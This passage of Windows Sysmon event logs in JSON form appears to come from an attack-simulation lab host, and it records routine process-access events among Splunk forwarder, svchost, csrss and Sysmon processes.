Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-001071D20500}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-001071D20500}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-001071D20500}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-001071D20500}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
